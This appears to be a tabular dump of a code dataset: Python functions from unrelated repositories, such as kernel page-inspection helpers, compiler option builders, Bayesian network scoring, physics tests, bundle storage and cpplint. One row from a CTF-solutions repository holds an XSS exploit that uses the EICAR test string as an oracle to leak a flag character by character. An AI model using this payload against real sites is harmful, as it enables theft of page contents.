function
stringlengths 11
56k
| repo_name
stringlengths 5
60
| features
sequence |
---|---|---|
def pfn_to_page(cls, pfn: int) -> gdb.Value:
if cls.sparsemem:
section_nr = pfn >> (cls.SECTION_SIZE_BITS - cls.PAGE_SHIFT)
root_idx = section_nr // cls.SECTIONS_PER_ROOT
offset = section_nr & (cls.SECTIONS_PER_ROOT - 1)
section = symvals.mem_section[root_idx][offset]
pagemap = section["section_mem_map"] & ~3
return (pagemap.cast(types.page_type.pointer()) + pfn).dereference()
# pylint doesn't have the visibility it needs to evaluate this
# pylint: disable=unsubscriptable-object
return cls.vmemmap[pfn] | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def setup_pageflags(cls, gdbtype: gdb.Type) -> None:
for field in gdbtype.fields():
cls.pageflags[field.name] = field.enumval
cls.setup_pageflags_done = True
if cls.setup_page_type_done and not cls.setup_pageflags_finish_done:
cls.setup_pageflags_finish()
cls.PG_slab = 1 << cls.pageflags['PG_slab']
cls.PG_lru = 1 << cls.pageflags['PG_lru'] | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def setup_vmemmap_base(cls, symbol: gdb.Symbol) -> None:
cls.vmemmap_base = int(symbol.value())
# setup_page_type() was first and used the hardcoded initial value,
# we have to update
cls.vmemmap = gdb.Value(cls.vmemmap_base).cast(types.page_type.pointer()) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def setup_directmap_base(cls, symbol: gdb.Symbol) -> None:
cls.directmap_base = int(symbol.value()) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def setup_zone_type(cls, gdbtype: gdb.Type) -> None:
max_nr_zones = gdbtype['__MAX_NR_ZONES'].enumval
cls.ZONES_WIDTH = int(ceil(log(max_nr_zones, 2))) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def setup_nodes_width(cls, symbol: Union[gdb.Symbol, gdb.MinSymbol]) -> None:
"""
Detect NODES_WITH from the in-kernel config table
Args:
symbol: The ``kernel_config_data`` symbol or minimal symbol.
It is not used directly. It is used to determine whether
the config data should be available.
"""
# TODO: handle kernels with no space for nodes in page flags
try:
cls.NODES_WIDTH = int(config['NODES_SHIFT'])
except (KeyError, DelayedAttributeError):
# XXX
print("Unable to determine NODES_SHIFT from config, trying 8")
cls.NODES_WIDTH = 8
# piggyback on this callback because type callback doesn't seem to work
# for unsigned long
cls.BITS_PER_LONG = types.unsigned_long_type.sizeof * 8 | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def setup_pageflags_finish(cls) -> None:
cls.setup_pageflags_finish_done = True
cls._is_tail = cls.__is_tail_compound_head_bit
cls._compound_head = cls.__compound_head_uses_low_bit
if 'PG_tail' in cls.pageflags.keys():
cls.PG_tail = 1 << cls.pageflags['PG_tail']
cls._is_tail = cls.__is_tail_flag
if cls.compound_head_name == 'first_page':
cls._compound_head = cls.__compound_head_first_page
if cls.PG_tail == -1:
cls.PG_tail = 1 << cls.pageflags['PG_compound'] | 1 << cls.pageflags['PG_reclaim']
cls._is_tail = cls.__is_tail_flagcombo | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def from_obj(cls, page: gdb.Value) -> 'Page':
pfn = (int(page.address) - Page.vmemmap_base) // types.page_type.sizeof
return Page(page, pfn) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def from_page_addr(cls, addr: int) -> 'Page':
page_ptr = gdb.Value(addr).cast(types.page_type.pointer())
return cls.from_obj(page_ptr.dereference()) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def __is_tail_flagcombo(self) -> bool:
return bool((self.flags & self.PG_tail) == self.PG_tail) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def __is_tail_compound_head_bit(self) -> bool:
return bool(self.gdb_obj['compound_head'] & 1) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def is_slab(self) -> bool:
return bool(self.flags & self.PG_slab) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def is_anon(self) -> bool:
mapping = int(self.gdb_obj["mapping"])
return (mapping & PAGE_MAPPING_ANON) != 0 | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def get_slab_page(self) -> gdb.Value:
if Page.slab_page_name == "lru":
return self.gdb_obj["lru"]["prev"]
return self.gdb_obj[Page.slab_page_name] | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def get_zid(self) -> int:
shift = self.BITS_PER_LONG - self.NODES_WIDTH - self.ZONES_WIDTH
zid = self.flags >> shift & ((1 << self.ZONES_WIDTH) - 1)
return zid | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def __compound_head_uses_low_bit(self) -> int:
return int(self.gdb_obj['compound_head']) - 1 | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def compound_head(self) -> 'Page':
if not self.is_tail():
return self
return self.__class__.from_page_addr(self.__compound_head()) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def page_addr(struct_page_addr: int) -> int:
pfn = (struct_page_addr - Page.vmemmap_base) // types.page_type.sizeof
return Page.directmap_base + (pfn * Page.PAGE_SIZE) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def page_from_addr(addr: int) -> 'Page':
pfn = (addr - Page.directmap_base) // Page.PAGE_SIZE
return pfn_to_page(pfn) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def page_from_gdb_obj(gdb_obj: gdb.Value) -> 'Page':
pfn = (int(gdb_obj.address) - Page.vmemmap_base) // types.page_type.sizeof
return Page(gdb_obj, pfn) | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def for_each_page() -> Iterable[Page]:
# TODO works only on x86?
max_pfn = int(symvals.max_pfn)
for pfn in range(max_pfn):
try:
yield pfn_to_page(pfn)
except gdb.error:
# TODO: distinguish pfn_valid() and report failures for those?
pass | jeffmahoney/crash-python | [
61,
23,
61,
13,
1455127548
] |
def allCompilerOptions (platformOptions):
result = platformOptions
result.append ("-Wall")
result.append ("-Werror")
result.append ("-Wreturn-type")
result.append ("-Wformat")
result.append ("-Wsign-compare")
result.append ("-Wpointer-arith") | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def compilerReleaseOptions (platformOptions):
result = platformOptions
result.append ("-DDO_NOT_GENERATE_CHECKINGS")
result.append ("-Wunused-variable")
return result | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def compilerDebugOptions (platformOptions):
result = platformOptions
result.append ("-g")
return result | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def C_CompilerOptions (platformOptions):
result = platformOptions
result.append ("-std=c99")
return result | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def Cpp_CompilerOptions (platformOptions):
result = platformOptions
result.append ("-std=c++14")
result.append ("-Woverloaded-virtual")
return result | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def ObjectiveC_CompilerOptions (platformOptions):
result = platformOptions
return result | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def ObjectiveCpp_CompilerOptions (platformOptions):
result = platformOptions
return result | TrampolineRTOS/trampoline | [
480,
230,
480,
24,
1441963168
] |
def trigger(c, idx):
import string
sess = requests.Session()
# init session
sess.post(URL + '/?action=login', data={'realname': 'new_session'})
# manipulate session
p = '''<script>f=function(n){eval('X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$$H+H'+{${c}:'*'}[Math.min(${c},n)])};f(document.body.innerHTML[${idx}].charCodeAt(0));</script><body>'''
p = string.Template(p).substitute({'idx': idx, 'c': c})
resp = sess.post(URL + '/?action=login', data={'realname': '"http://127.0.0.1/flag?a=' + p, 'nickname': '</body>'})
return "<h1>Welcome" not in resp.text | Qwaz/solved-hacking-problem | [
78,
22,
78,
1,
1452176298
] |
def log(x):
return math.log(x,2) | sysbio-vo/bnfinder | [
47,
7,
47,
1,
1422015925
] |
def __init__(self,prior=None,*args,**kwds):
score.__init__(self,*args,**kwds)
self.prior=prior | sysbio-vo/bnfinder | [
47,
7,
47,
1,
1422015925
] |
def HP(self,v,par):
if self.prior==None:
return max(2,v.n_disc)
else:
hp=float(self.prior)
for p in par:
hp/=max(2,p.n_disc)
return hp | sysbio-vo/bnfinder | [
47,
7,
47,
1,
1422015925
] |
def H(self,v,par):
if self.prior==None:
return 1.0
else:
return self.HP(v,par)/max(2,v.n_disc) | sysbio-vo/bnfinder | [
47,
7,
47,
1,
1422015925
] |
def graph_score(self,number_of_potential_parents,gene_vertex,weights_of_parents,number_of_data_points):
return sum(map(log,weights_of_parents))*log(number_of_data_points+1)*min(1,gene_vertex.n_disc+0.1) | sysbio-vo/bnfinder | [
47,
7,
47,
1,
1422015925
] |
def lower_bound_for_data_score(self,selected_data_empty):
if self.prior!=None:
return 0.0
HP=self.HP(selected_data_empty.vertex,[])
H=self.H(selected_data_empty.vertex,[])
stats_all,stats_par = selected_data_empty.stats()
if selected_data_empty.vertex.n_disc:
s = 0
for a,cv in stats_all.items():
for i in range(0,cv):
s-=log(H+i)
s+=log(HP+i)
else:
return 0.0 | sysbio-vo/bnfinder | [
47,
7,
47,
1,
1422015925
] |
def test_num_swaps_to_sort(array, expected_num_swaps):
assert num_swaps_to_sort(array) == expected_num_swaps | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_init_input_density_matrix(self):
# Setup
Job = InitJob("test_data/JobDef_input_density_matrix.json")
input_rho_file = Job.Def['input_rho']
with open(input_rho_file, 'r') as file_handle:
input_rho = np.matrix(json.load(file_handle))
# Action
electronic = Electronic(Job)
# Result
assert np.array_equal(electronic.rho, input_rho)
assert np.array_equal(electronic.rhotot, input_rho) | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_quantum_number_S_is_None(self):
# Setup
Job = InitJob("test_data/JobDef_scase.json")
# Fake
def fake_magnetic_correlation(*args):
return -1
Job.Electron.magnetic_correlation = fake_magnetic_correlation
# Action
S = Job.Electron.quantum_number_S(Job)
# Result
assert S is None | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_quantum_number_S(self, name, rho, expected_S):
# Setup
Job = InitJob("test_data/JobDef_scase.json")
# Spin 0 density matrix
Job.Electron.rho = np.matrix(rho)
# Action
S = Job.Electron.quantum_number_S(Job)
# Result
assert S == expected_S | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def fake_L_z_p_orb(*args):
return -1 | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_quantum_number_L_z_d_orb_is_None(self):
# Setup
Job = InitJob("test_data/JobDef_pcase.json")
# Fake
def fake_L_z_d_orb(*args):
return -1
Job.Electron.L_z_d_orb = fake_L_z_d_orb
# Action
L_z = Job.Electron.quantum_number_L_z_d_orb(Job)
# Result
assert L_z is None | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_quantum_number_L_z(self, name, rho, expected_L_z):
# Setup
Job = InitJob("test_data/JobDef_pcase.json")
# Fake
Job.NAtom = 1
Job.NOrb = [len(rho)/2]
Job.Electron.NElectrons = sum(rho[ii][ii] for ii in range(len(rho)))
Job.Electron.rho = np.matrix(rho, dtype='complex')
# Action
L_z = Job.Electron.quantum_number_L_z(Job)
# Result
assert L_z == expected_L_z | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_quantum_number_L_z_dimers(self, job_file, rho_file, expected_L_z):
# Setup
Job = InitJob(job_file)
# Fake
rho = load_json_file(rho_file)
Job.Electron.rho = np.matrix(rho, dtype='complex')
# Action
L_z = Job.Electron.quantum_number_L_z(Job)
# Result
assert L_z == expected_L_z | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_quantum_number_L_z_1_electron(self):
# Setup
Job = InitJob("test_data/JobDef_scase.json")
Job.Electron.NElectrons = 1
# Action
L_z = Job.Electron.quantum_number_L_z(Job)
# Result
assert L_z == 0 | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_all_atoms_same_num_orbitals(self, norb, expected_result):
# Setup
Job = InitJob("test_data/JobDef_scase.json")
# Fake
Job.NOrb = norb
# Action
result = Job.Electron.all_atoms_same_num_orbitals(Job)
# Result
assert result is expected_result | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_perform_inversion(self, job_file, old_eigenvectors,
expected_eigenvectors):
# Setup
Job = InitJob(job_file)
# Action
new_eigenvectors = Job.Electron.perform_inversion(Job, old_eigenvectors)
# Result
assert all(np.array_equal(new_eigenvectors[i], expected_eigenvectors[i])
for i in range(len(expected_eigenvectors))) | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_symmetry_operation_result(self, name, new_eigenvectors,
old_eigenvectors, expected_result):
# Setup
Job = InitJob("test_data/JobDef_scase.json")
# Action
result = Job.Electron.symmetry_operation_result(Job, new_eigenvectors,
old_eigenvectors)
# Result
assert result == expected_result | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_gerade(self, job_file, expected_gerade):
# Setup
Job = InitJob(job_file)
Job = execute_job(Job)
# Action
gerade = Job.Electron.gerade(Job)
# Result
assert gerade == expected_gerade | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_get_reflected_value(self, job_file, orbital, initial_value,
expected_reflected_value):
# Setup
Job = InitJob(job_file)
atom = 0
# Action
reflected_value = Job.Electron.get_reflected_value(Job, initial_value,
atom, orbital)
# Result
assert reflected_value == expected_reflected_value | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def test_perform_reflection(self, job_file, old_eigenvectors,
expected_eigenvectors):
# Setup
Job = InitJob(job_file)
# Action
new_eigenvectors = Job.Electron.perform_reflection(Job, old_eigenvectors)
# Result
assert all(np.array_equal(new_eigenvectors[i], expected_eigenvectors[i])
for i in range(len(expected_eigenvectors))) | mec07/PyLATO | [
3,
2,
3,
7,
1433328488
] |
def __init__(self, repo):
storetype = repo.ui.config("infinitepush", "storetype", "")
if storetype == "disk":
self.store = filebundlestore(repo)
elif storetype == "external":
self.store = externalbundlestore(repo)
else:
raise error.Abort(
_("unknown infinitepush store type specified %s") % storetype
)
indextype = repo.ui.config("infinitepush", "indextype", "")
if indextype == "disk":
from . import fileindex
self.index = fileindex.fileindex(repo)
elif indextype == "sql":
# Delayed import of sqlindex to avoid including unnecessary
# dependencies on mysql.connector.
from . import sqlindex
self.index = sqlindex.sqlindex(repo)
else:
raise error.Abort(
_("unknown infinitepush index type specified %s") % indextype
) | facebookexperimental/eden | [
4737,
192,
4737,
106,
1462467227
] |
def __init__(self, repo):
self.storepath = repo.ui.configpath("scratchbranch", "storepath")
if not self.storepath:
self.storepath = repo.localvfs.join("scratchbranches", "filebundlestore")
if not os.path.exists(self.storepath):
os.makedirs(self.storepath) | facebookexperimental/eden | [
4737,
192,
4737,
106,
1462467227
] |
def _filepath(self, filename):
return os.path.join(self._dirpath(filename), filename) | facebookexperimental/eden | [
4737,
192,
4737,
106,
1462467227
] |
def read(self, key):
try:
f = open(self._filepath(key), "rb")
except IOError:
return None
return f.read() | facebookexperimental/eden | [
4737,
192,
4737,
106,
1462467227
] |
def __init__(self, repo):
"""
`put_binary` - path to binary file which uploads bundle to external
storage and prints key to stdout
`put_args` - format string with additional args to `put_binary`
{filename} replacement field can be used.
`get_binary` - path to binary file which accepts filename and key
(in that order), downloads bundle from store and saves it to file
`get_args` - format string with additional args to `get_binary`.
{filename} and {handle} replacement field can be used.
"""
ui = repo.ui
# path to the binary which uploads a bundle to the external store
# and prints the key to stdout.
self.put_binary = ui.config("infinitepush", "put_binary")
if not self.put_binary:
raise error.Abort("put binary is not specified")
# Additional args to ``put_binary``. The '{filename}' replacement field
# can be used to get the filename.
self.put_args = ui.configlist("infinitepush", "put_args", [])
# path to the binary which accepts a file and key (in that order) and
# downloads the bundle form the store and saves it to the file.
self.get_binary = ui.config("infinitepush", "get_binary")
if not self.get_binary:
raise error.Abort("get binary is not specified")
# Additional args to ``get_binary``. The '{filename}' and '{handle}'
# replacement fields can be used to get the filename and key.
self.get_args = ui.configlist("infinitepush", "get_args", []) | facebookexperimental/eden | [
4737,
192,
4737,
106,
1462467227
] |
def write(self, data):
# Won't work on windows because you can't open file second time without
# closing it
with NamedTemporaryFile() as temp:
temp.write(data)
temp.flush()
temp.seek(0)
formatted_args = [arg.format(filename=temp.name) for arg in self.put_args]
returncode, stdout, stderr = self._call_binary(
[self.put_binary] + formatted_args
)
if returncode != 0:
raise error.Abort(
"Infinitepush failed to upload bundle to external store: %s"
% stderr
)
stdout_lines = stdout.splitlines()
if len(stdout_lines) == 1:
return stdout_lines[0]
else:
raise error.Abort(
"Infinitepush received bad output from %s: %s"
% (self.put_binary, stdout)
) | facebookexperimental/eden | [
4737,
192,
4737,
106,
1462467227
] |
def ParseNolintSuppressions(filename, raw_line, linenum, error):
"""Updates the global list of error-suppressions.
Parses any NOLINT comments on the current line, updating the global
error_suppressions store. Reports an error if the NOLINT comment
was malformed.
Args:
filename: str, the name of the input file.
raw_line: str, the line of input text, with comments.
linenum: int, the number of the current line.
error: function, an error handler.
"""
matched = Search(r'\bNOLINT(NEXTLINE)?\b(\([^)]+\))?', raw_line)
if matched:
if matched.group(1):
suppressed_line = linenum + 1
else:
suppressed_line = linenum
category = matched.group(2)
if category in (None, '(*)'): # => "suppress all"
_error_suppressions.setdefault(None, set()).add(suppressed_line)
else:
if category.startswith('(') and category.endswith(')'):
category = category[1:-1]
if category in _ERROR_CATEGORIES:
_error_suppressions.setdefault(category, set()).add(suppressed_line)
elif category not in _LEGACY_ERROR_CATEGORIES:
error(filename, linenum, 'readability/nolint', 5,
'Unknown NOLINT error category: %s' % category) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def IsErrorSuppressedByNolint(category, linenum):
"""Returns true if the specified error category is suppressed on this line.
Consults the global error_suppressions map populated by
ParseNolintSuppressions/ResetNolintSuppressions.
Args:
category: str, the category of the error.
linenum: int, the current line number.
Returns:
bool, True iff the error should be suppressed due to a NOLINT comment.
"""
return (linenum in _error_suppressions.get(category, set()) or
linenum in _error_suppressions.get(None, set())) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def ReplaceAll(pattern, rep, s):
"""Replaces instances of pattern in a string with a replacement.
The compiled regex is kept in a cache shared by Match and Search.
Args:
pattern: regex pattern
rep: replacement text
s: search string
Returns:
string with replacements made (or original string if no replacements)
"""
if pattern not in _regexp_compile_cache:
_regexp_compile_cache[pattern] = sre_compile.compile(pattern)
return _regexp_compile_cache[pattern].sub(rep, s) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self):
self.include_list = [[]]
self.ResetSection('') | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def ResetSection(self, directive):
"""Reset section checking for preprocessor directive.
Args:
directive: preprocessor directive (e.g. "if", "else").
"""
# The name of the current section.
self._section = self._INITIAL_SECTION
# The path of last found header.
self._last_header = ''
# Update list of includes. Note that we never pop from the
# include list.
if directive in ('if', 'ifdef', 'ifndef'):
self.include_list.append([])
elif directive in ('else', 'elif'):
self.include_list[-1] = [] | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CanonicalizeAlphabeticalOrder(self, header_path):
"""Returns a path canonicalized for alphabetical comparison.
- replaces "-" with "_" so they both cmp the same.
- removes '-inl' since we don't require them to be after the main header.
- lowercase everything, just in case.
Args:
header_path: Path to be canonicalized.
Returns:
Canonicalized path.
"""
return header_path.replace('-inl.h', '.h').replace('-', '_').lower() | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CheckNextIncludeOrder(self, header_type):
"""Returns a non-empty error message if the next header is out of order.
This function also updates the internal state to be ready to check
the next include.
Args:
header_type: One of the _XXX_HEADER constants defined above.
Returns:
The empty string if the header is in the right order, or an
error message describing what's wrong.
"""
error_message = ('Found %s after %s' %
(self._TYPE_NAMES[header_type],
self._SECTION_NAMES[self._section]))
last_section = self._section
if header_type == _C_SYS_HEADER:
if self._section <= self._C_SECTION:
self._section = self._C_SECTION
else:
self._last_header = ''
return error_message
elif header_type == _CPP_SYS_HEADER:
if self._section <= self._CPP_SECTION:
self._section = self._CPP_SECTION
else:
self._last_header = ''
return error_message
elif header_type == _LIKELY_MY_HEADER:
if self._section <= self._MY_H_SECTION:
self._section = self._MY_H_SECTION
else:
self._section = self._OTHER_H_SECTION
elif header_type == _POSSIBLE_MY_HEADER:
if self._section <= self._MY_H_SECTION:
self._section = self._MY_H_SECTION
else:
# This will always be the fallback because we're not sure
# enough that the header is associated with this file.
self._section = self._OTHER_H_SECTION
else:
assert header_type == _OTHER_HEADER
self._section = self._OTHER_H_SECTION
if last_section != self._section:
self._last_header = ''
return '' | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self):
self.verbose_level = 1 # global setting.
self.error_count = 0 # global count of reported errors
# filters to apply when emitting error messages
self.filters = _DEFAULT_FILTERS[:]
# backup of filter list. Used to restore the state after each file.
self._filters_backup = self.filters[:]
self.counting = 'total' # In what way are we counting errors?
self.errors_by_category = {} # string to int dict storing error counts
# output format:
# "emacs" - format that emacs can parse (default)
# "vs7" - format that Microsoft Visual Studio 7 can parse
self.output_format = 'emacs' | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def SetVerboseLevel(self, level):
"""Sets the module's verbosity, and returns the previous setting."""
last_verbose_level = self.verbose_level
self.verbose_level = level
return last_verbose_level | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def SetFilters(self, filters):
"""Sets the error-message filters.
These filters are applied when deciding whether to emit a given
error message.
Args:
filters: A string of comma-separated filters (eg "+whitespace/indent").
Each filter should start with + or -; else we die.
Raises:
ValueError: The comma-separated filters did not all start with '+' or '-'.
E.g. "-,+whitespace,-whitespace/indent,whitespace/badfilter"
"""
# Default filters always have less priority than the flag ones.
self.filters = _DEFAULT_FILTERS[:]
self.AddFilters(filters) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def BackupFilters(self):
""" Saves the current filter list to backup storage."""
self._filters_backup = self.filters[:] | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def ResetErrorCounts(self):
"""Sets the module's error statistic back to zero."""
self.error_count = 0
self.errors_by_category = {} | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def PrintErrorCounts(self):
"""Print a summary of errors by category, and the total."""
for category, count in self.errors_by_category.iteritems():
sys.stderr.write('Category \'%s\' errors found: %d\n' %
(category, count))
sys.stderr.write('Total errors found: %d\n' % self.error_count) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _OutputFormat():
"""Gets the module's output format."""
return _cpplint_state.output_format | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _VerboseLevel():
"""Returns the module's verbosity setting."""
return _cpplint_state.verbose_level | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _SetCountingStyle(level):
"""Sets the module's counting options."""
_cpplint_state.SetCountingStyle(level) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _SetFilters(filters):
"""Sets the module's error-message filters.
These filters are applied when deciding whether to emit a given
error message.
Args:
filters: A string of comma-separated filters (eg "whitespace/indent").
Each filter should start with + or -; else we die.
"""
_cpplint_state.SetFilters(filters) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _BackupFilters():
""" Saves the current filter list to backup storage."""
_cpplint_state.BackupFilters() | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self):
self.in_a_function = False
self.lines_in_function = 0
self.current_function = '' | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def Count(self):
"""Count line in current function body."""
if self.in_a_function:
self.lines_in_function += 1 | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def End(self):
"""Stop analyzing function body."""
self.in_a_function = False | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self, filename):
self._filename = filename | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def RepositoryName(self):
"""FullName after removing the local path to the repository.
If we have a real absolute path name here we can try to do something smart:
detecting the root of the checkout and truncating /path/to/checkout from
the name so that we get header guards that don't include things like
"C:\Documents and Settings\..." or "/home/username/..." in them and thus
people on different computers who have checked the source out to different
locations won't see bogus errors.
"""
fullname = self.FullName()
if os.path.exists(fullname):
project_dir = os.path.dirname(fullname)
if os.path.exists(os.path.join(project_dir, ".svn")):
# If there's a .svn file in the current directory, we recursively look
# up the directory tree for the top of the SVN checkout
root_dir = project_dir
one_up_dir = os.path.dirname(root_dir)
while os.path.exists(os.path.join(one_up_dir, ".svn")):
root_dir = os.path.dirname(root_dir)
one_up_dir = os.path.dirname(one_up_dir)
prefix = os.path.commonprefix([root_dir, project_dir])
return fullname[len(prefix) + 1:]
# Not SVN <= 1.6? Try to find a git, hg, or svn top level directory by
# searching up from the current path.
root_dir = os.path.dirname(fullname)
while (root_dir != os.path.dirname(root_dir) and
not os.path.exists(os.path.join(root_dir, ".git")) and
not os.path.exists(os.path.join(root_dir, ".hg")) and
not os.path.exists(os.path.join(root_dir, ".svn"))):
root_dir = os.path.dirname(root_dir)
if (os.path.exists(os.path.join(root_dir, ".git")) or
os.path.exists(os.path.join(root_dir, ".hg")) or
os.path.exists(os.path.join(root_dir, ".svn"))):
prefix = os.path.commonprefix([root_dir, project_dir])
return fullname[len(prefix) + 1:]
# Don't know what to do; header guard warnings may be wrong...
return fullname | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def BaseName(self):
"""File base name - text after the final slash, before the final period."""
return self.Split()[1] | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def NoExtension(self):
"""File has no source file extension."""
return '/'.join(self.Split()[0:2]) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _ShouldPrintError(category, confidence, linenum):
"""If confidence >= verbose, category passes filter and is not suppressed."""
# There are three ways we might decide not to print an error message:
# a "NOLINT(category)" comment appears in the source,
# the verbosity level isn't high enough, or the filters filter it out.
if IsErrorSuppressedByNolint(category, linenum):
return False
if confidence < _cpplint_state.verbose_level:
return False
is_filtered = False
for one_filter in _Filters():
if one_filter.startswith('-'):
if category.startswith(one_filter[1:]):
is_filtered = True
elif one_filter.startswith('+'):
if category.startswith(one_filter[1:]):
is_filtered = False
else:
assert False # should have been checked for in SetFilter.
if is_filtered:
return False
return True | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def IsCppString(line):
"""Does line terminate so, that the next symbol is in string constant.
This function does not consider single-line nor multi-line comments.
Args:
line: is a partial line of code starting from the 0..n.
Returns:
True, if next character appended to 'line' is inside a
string constant.
"""
line = line.replace(r'\\', 'XX') # after this, \\" does not match to \"
return ((line.count('"') - line.count(r'\"') - line.count("'\"'")) & 1) == 1 | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def FindNextMultiLineCommentStart(lines, lineix):
"""Find the beginning marker for a multiline comment."""
while lineix < len(lines):
if lines[lineix].strip().startswith('/*'):
# Only return this marker if the comment goes beyond this line
if lines[lineix].strip().find('*/', 2) < 0:
return lineix
lineix += 1
return len(lines) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def RemoveMultiLineCommentsFromRange(lines, begin, end):
"""Clears a range of lines for multi-line comments."""
# Having // dummy comments makes the lines non-empty, so we will not get
# unnecessary blank line warnings later in the code.
for i in range(begin, end):
lines[i] = '/**/' | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def CleanseComments(line):
"""Removes //-comments and single-line C-style /* */ comments.
Args:
line: A line of C++ source.
Returns:
The line with single-line comments removed.
"""
commentpos = line.find('//')
if commentpos != -1 and not IsCppString(line[:commentpos]):
line = line[:commentpos].rstrip()
# get rid of /* ... */
return _RE_PATTERN_CLEANSE_LINE_C_COMMENTS.sub('', line) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def __init__(self, lines):
self.elided = []
self.lines = []
self.raw_lines = lines
self.num_lines = len(lines)
self.lines_without_raw_strings = CleanseRawStrings(lines)
for linenum in range(len(self.lines_without_raw_strings)):
self.lines.append(CleanseComments(
self.lines_without_raw_strings[linenum]))
elided = self._CollapseStrings(self.lines_without_raw_strings[linenum])
self.elided.append(CleanseComments(elided)) | 24OI/CodeStack | [
15,
6,
15,
4,
1445156661
] |
def _CollapseStrings(elided):
"""Collapses strings and chars on a line to simple "" or '' blocks.
We nix strings first so we're not fooled by text like '"http://"'
Args:
elided: The line being processed.
Returns:
The line with collapsed strings.
"""
if _RE_PATTERN_INCLUDE.match(elided):
return elided
# Remove escaped characters first to make quote/single quote collapsing
# basic. Things that look like escaped characters shouldn't occur
# outside of strings and chars.
elided = _RE_PATTERN_CLEANSE_LINE_ESCAPES.sub('', elided)
# Replace quoted strings and digit separators. Both single quotes
# and double quotes are processed in the same loop, otherwise
# nested quotes wouldn't work.
collapsed = ''
while True:
# Find the first quote character
match = Match(r'^([^\'"]*)([\'"])(.*)$', elided)
if not match:
collapsed += elided
break
head, quote, tail = match.groups()
if quote == '"':
# Collapse double quoted strings
second_quote = tail.find('"')
if second_quote >= 0:
collapsed += head + '""'
elided = tail[second_quote + 1:]
else:
# Unmatched double quote, don't bother processing the rest
# of the line since this is probably a multiline string.
collapsed += elided
break
else:
# Found single quote, check nearby text to eliminate digit separators.
#
# There is no special handling for floating point here, because
# the integer/fractional/exponent parts would all be parsed
# correctly as long as there are digits on both sides of the
# separator. So we are fine as long as we don't see something
